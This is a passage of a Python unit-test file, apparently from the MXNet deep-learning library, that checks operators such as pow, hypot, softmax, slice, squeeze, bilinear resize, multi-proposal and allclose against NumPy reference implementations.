name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtypes
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@with_seed()
def test_softmax():
check_softmax_with_shape((3, 4), default_context(), preserve_shape=False)
check_softmax_with_shape((3, 4), default_context(), preserve_shape=True)
check_softmax_with_shape((3, 4, 2), default_context(), preserve_shape=True)
check_softmax_grad(default_context())
check_smoothed_softmax_grad(default_context())
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_softmax_output_normalization():
def _softmaxoutput_normalization(multi_output, use_ignore, normalization):
grad_scale = np.random.random()
batch_size = 8
num_labels = 6
H, W = 3, 3
ignore_label = np.random.randint(0, num_labels) if use_ignore else -1
if multi_output:
data_shape = (batch_size, num_labels, H, W)
label_shape = (batch_size, H, W)
else:
data_shape = (batch_size, num_labels)
label_shape = (batch_size, )
data = mx.nd.random.uniform(-1, 1, shape=data_shape)
label = mx.nd.random.randint(
0, num_labels, shape=label_shape).astype('float32')
data.attach_grad()
kwargs = dict(grad_scale=grad_scale,
normalization=normalization, multi_output=multi_output)
if use_ignore:
kwargs.update(use_ignore=True, ignore_label=ignore_label)
with mx.autograd.record():
out = mx.nd.SoftmaxOutput(data=data, label=label, **kwargs)
out.backward(mx.nd.ones_like(data))
exp_data = mx.nd.exp(data)
softmax_data = exp_data / exp_data.sum(1, keepdims=True)
argmax_data = mx.nd.argmax(data, axis=1)
assert_almost_equal(out.asnumpy(), softmax_data.asnumpy())
one_hot_label = mx.nd.one_hot(label, num_labels)
if multi_output:
one_hot_label = one_hot_label.transpose((0, 3, 1, 2))
data_grad = softmax_data - one_hot_label
if use_ignore:
if multi_output:
data_grad *= (label !=
ignore_label).reshape((batch_size, 1, H, W))
else:
data_grad *= (label != ignore_label).reshape((batch_size, 1))
valid_cnt = 1
if normalization == 'batch':
valid_cnt = batch_size
elif normalization == 'valid':
valid_cnt = mx.nd.maximum(1, (label != ignore_label).sum())
scale = grad_scale / valid_cnt
if multi_output:
if normalization != 'valid':
scale /= H * W
data_grad *= scale
assert_almost_equal(data.grad.asnumpy(), data_grad.asnumpy())
for multi_output in [False, True]:
for use_ignore in [False, True]:
for normalization in ['null', 'batch', 'valid']:
_softmaxoutput_normalization(
multi_output, use_ignore, normalization)
@with_seed()
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
(slice(None, None, -1), slice(None, None, -1), slice(None, None, -1)),
(slice(10, 0, -2), slice(5, 2, -1), slice(7, None, 3), slice(None, 12, 4))]
for index in index_list:
test_slice_forward_backward(arr, index)
# check numeric gradient
in_data = np.arange(36).reshape(2, 2, 3, 3)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
pytest.raises(MXNetError, min)
pytest.raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,):  # as an exception, an all-ones shape such as (1, 1, 1, 1) is squeezed to (1,)
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
@pytest.mark.serial
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
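        # Backward reference: the incoming gradient of every output pixel is scattered back
        # to the same 2x2 input neighbourhood with the same bilinear weights used in the
        # forward pass. In 'like' mode a zero gradient is also returned for the
        # shape-providing second input.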
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
            data_np_like = x_1.asnumpy()
            check_symbolic_forward(resize_sym, [data_np, data_np_like], [expected], rtol=1e-3, atol=1e-5)
            check_symbolic_backward(resize_sym, [data_np, data_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
            check_numeric_gradient(resize_sym, [data_np, data_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
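        # Run the single-image Proposal op sample by sample and check that the batched
        # MultiProposal op produces the same boxes, per-sample batch indices and scores.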
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
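        # MultiProposal does not backpropagate into cls_prob/bbox_pred/im_info,
        # so all input gradients are expected to be zero.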
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
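            # analytic gradient of a*x**2 + b*x + c with respect to x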
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
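        # Perturb the base tolerance by up to +/- `percent` percent so every run
        # exercises slightly different rtol/atol values.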
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Report the elements that this context flags as "not close", together with the
                    # corresponding elements of the comparison vector (CPU/GPU/Python) that treats them as "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
                    # Collect the indices of all violations and the corresponding coordinate values
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                    idx = np.asarray(np.where(bad_indexes == True)).T  # one row of coordinates per violation
idx_flat = np.asarray(np.where(bad_indexes.flatten() == True)).flatten()
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
            if expected != result[0] or (num_ctx > 1 and expected != result[1]):
                assert False
@with_seed()
@pytest.mark.serial
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
